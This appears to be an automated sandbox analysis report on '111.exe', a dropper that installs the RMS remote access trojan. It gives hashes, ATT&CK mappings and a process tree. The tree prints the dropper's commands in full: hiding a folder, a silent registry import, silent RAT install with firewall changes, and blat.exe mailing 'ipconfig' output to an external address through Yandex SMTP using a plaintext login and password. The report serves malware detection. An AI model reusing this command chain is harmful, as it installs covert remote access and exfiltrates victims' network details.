rms | 75d36fc4f14630cd347bce7e8fcf951b42bf47a7fc1e33af4a5ec7b2ec867a71

Analysis

max time kernel
146s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02-11-2024 13:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

111.exe
Size

21KB
MD5

82427df03213df677115af3d9bc8d134
SHA1

f2870bd0ebba0d5bf4b8b06099047cdbfb5254b3
SHA256

8433cab0e54e801a2be34fb149acf6bf8b87a60828eefe47af05edff762fe586
SHA512

3141435c43fe6dc7f76786455d8daa8af2e99a56936cab76cbfbd867ef77fdb2999a32f7d73213a513bb1ee5a5a2192d52f5163750647c5386d2ddabdaad1fa3
SSDEEP

384:UIiV728hUQ7Y2P/cVEccDdye7kjlWLe7grPiA8jyrMPhTjanbBoZKqaNJawcudoq:URGuY2P0Vo6r7SiAwyrMRjbMnbcuyD7h

Score

10^/10

rms discovery rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3052-0-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/memory/3052-24-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManServer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManServer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManFUSClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	111.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManServer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManServer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RManFUSClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	blat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2716	ipconfig.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2672	regedit.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2820	RManServer.exe
2820	RManServer.exe
2252	RManFUSClient.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2744	RManServer.exe
Token: SeDebugPrivilege	2764	RManServer.exe
Token: SeTakeOwnershipPrivilege	2820	RManServer.exe
Token: SeTcbPrivilege	2820	RManServer.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 2900	3052	111.exe	31
PID 3052 wrote to memory of 2900	3052	111.exe	31
PID 3052 wrote to memory of 2900	3052	111.exe	31
PID 3052 wrote to memory of 2900	3052	111.exe	31
PID 2900 wrote to memory of 2216	2900	cmd.exe	33
PID 2900 wrote to memory of 2216	2900	cmd.exe	33
PID 2900 wrote to memory of 2216	2900	cmd.exe	33
PID 2900 wrote to memory of 2216	2900	cmd.exe	33
PID 2900 wrote to memory of 2672	2900	cmd.exe	34
PID 2900 wrote to memory of 2672	2900	cmd.exe	34
PID 2900 wrote to memory of 2672	2900	cmd.exe	34
PID 2900 wrote to memory of 2672	2900	cmd.exe	34
PID 2900 wrote to memory of 2692	2900	cmd.exe	35
PID 2900 wrote to memory of 2692	2900	cmd.exe	35
PID 2900 wrote to memory of 2692	2900	cmd.exe	35
PID 2900 wrote to memory of 2692	2900	cmd.exe	35
PID 2900 wrote to memory of 2744	2900	cmd.exe	36
PID 2900 wrote to memory of 2744	2900	cmd.exe	36
PID 2900 wrote to memory of 2744	2900	cmd.exe	36
PID 2900 wrote to memory of 2744	2900	cmd.exe	36
PID 2900 wrote to memory of 2764	2900	cmd.exe	37
PID 2900 wrote to memory of 2764	2900	cmd.exe	37
PID 2900 wrote to memory of 2764	2900	cmd.exe	37
PID 2900 wrote to memory of 2764	2900	cmd.exe	37
PID 2820 wrote to memory of 2252	2820	RManServer.exe	39
PID 2820 wrote to memory of 2252	2820	RManServer.exe	39
PID 2820 wrote to memory of 2252	2820	RManServer.exe	39
PID 2820 wrote to memory of 2252	2820	RManServer.exe	39
PID 2900 wrote to memory of 2564	2900	cmd.exe	40
PID 2900 wrote to memory of 2564	2900	cmd.exe	40
PID 2900 wrote to memory of 2564	2900	cmd.exe	40
PID 2900 wrote to memory of 2564	2900	cmd.exe	40
PID 2820 wrote to memory of 3056	2820	RManServer.exe	41
PID 2820 wrote to memory of 3056	2820	RManServer.exe	41
PID 2820 wrote to memory of 3056	2820	RManServer.exe	41
PID 2820 wrote to memory of 3056	2820	RManServer.exe	41
PID 2900 wrote to memory of 2716	2900	cmd.exe	42
PID 2900 wrote to memory of 2716	2900	cmd.exe	42
PID 2900 wrote to memory of 2716	2900	cmd.exe	42
PID 2900 wrote to memory of 2716	2900	cmd.exe	42
PID 2900 wrote to memory of 2532	2900	cmd.exe	43
PID 2900 wrote to memory of 2532	2900	cmd.exe	43
PID 2900 wrote to memory of 2532	2900	cmd.exe	43
PID 2900 wrote to memory of 2532	2900	cmd.exe	43

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2216	attrib.exe

C:\Users\Admin\AppData\Local\Temp\111.exe
"C:\Users\Admin\AppData\Local\Temp\111.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\DC7A.tmp\111.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "Word"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2216
- - C:\Windows\SysWOW64\regedit.exe
    regedit /s "111.reg"
    3⤵
    - System Location Discovery: System Language Discovery
    - Runs .reg file with regedit
    PID:2672
- - C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
    "Word\RManServer.exe" /server /firewall
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2692
- - C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
    "Word\RManServer.exe" /server /silentinstall
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
- - C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
    "Word\RManServer.exe" /server /start
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- - C:\Users\Admin\AppData\Local\Temp\blat.exe
    blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u LIMON12000 -pw nat12345
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2564
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:2716
- - C:\Users\Admin\AppData\Local\Temp\blat.exe
    blat.exe ip.txt -to [email protected].
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2532

C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
C:\Users\Admin\AppData\Local\Temp\Word\RManServer.exe
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820
- C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe
  "C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2252
- C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe
  C:\Users\Admin\AppData\Local\Temp\Word\RManFUSClient.exe /tray
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DC7A.tmp\111.bat

Filesize
396B

MD5
b348cd1535602f34657360ef9a3e42a1

SHA1
43c5823f1d14d28c6c3ca2e20648256715ba97ca

SHA256
318dbd13350c6250369cb98d7c768ef8959df150852728aedee011c95d191dc5

SHA512
7b50f003f8492709b1ee67ec5b76f8a8d1b82977499197ec35b75606da397e4f2d38578c1cbd1314706716088c0f4d1a22cf7bd7fc93476c637b60f6ac3ee9e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ip.txt

Filesize
1KB

MD5
29925ef5550c8a78d81e84a6cb3a3039

SHA1
0887e9a218f280425f33fd7de4617669ade6f438

SHA256
eacb41a5e088e35bf21e9ae11c8cb22622fa392888d779eeada19983cf4ea675

SHA512
7056bc9e746995da243c7e5789155c169e9bf665d04c9e4b5328841ce270f9cb4af99bb3baf77f6044d726d40372f1aa37dd2391b5b8ea93a4e60b7053e24b17

Download Submit
memory/2252-26-0x0000000000400000-0x0000000000717000-memory.dmp

Filesize
3.1MB

Download
memory/2692-16-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download
memory/2744-17-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download
memory/2764-18-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download
memory/2820-25-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download
memory/2820-28-0x0000000000400000-0x0000000000786000-memory.dmp

Filesize
3.5MB

Download
memory/3052-0-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3052-24-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3056-27-0x0000000000400000-0x0000000000717000-memory.dmp

Filesize
3.1MB

Download